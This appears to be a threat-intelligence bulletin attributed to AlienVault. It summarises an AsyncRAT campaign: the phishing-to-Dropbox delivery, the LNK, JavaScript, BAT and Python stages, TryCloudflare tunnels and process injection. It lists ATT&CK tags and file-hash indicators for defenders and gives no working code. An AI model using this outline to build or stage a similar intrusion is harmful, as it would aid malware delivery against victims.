A new AsyncRAT malware campaign has been identified, utilizing malicious payloads delivered through TryCloudflare quick tunnels and Python packages. The attack chain begins with a phishing email containing a Dropbox URL, leading to a ZIP file with an internet shortcut. This triggers a series of downloads, ultimately executing AsyncRAT malware via Python scripts. The campaign employs legitimate infrastructure like Dropbox and TryCloudflare to evade detection. It uses a multi-step process involving LNK, JavaScript, and BAT files, culminating in the extraction of malicious Python scripts. The attackers use process injection techniques to inject shellcode into legitimate processes like notepad.exe and explorer.exe. This sophisticated approach highlights the evolving nature of cyber threats and the exploitation of legitimate services for malicious purposes. Author: AlienVault
Related Tags:
evasion techniques
T1059.006
remote access trojan
T1204.002
T1059.001
T1129
python
AsyncRAT
DropBox
Associated Indicators:
784F004BB7683C74758FB1D294627177E1CE93815B4F1B69964C93089FF27C63
8EF36A4865F4A73A4E8FE4B90E5EFF4A7FEB3647
55724B766DD1FE8BF9DD4CB7094B83B88D57D945
0AA1B8FBA8D7BD19A0064EDFDF86C027DA253644
FF6186EEF1C17A2668C6013D38FECEAD4F507556
4747EE49BDF31351C025049D8C3B7FEF831BE77C
AE1DECE09C2B627D8D3FE1C1F758DB9CA6D5820C
8DC9071A46A019547C8355A155D9C3C3B154E7A2
659ECDEB19B8E49BE61FE41E8796D1215272B16E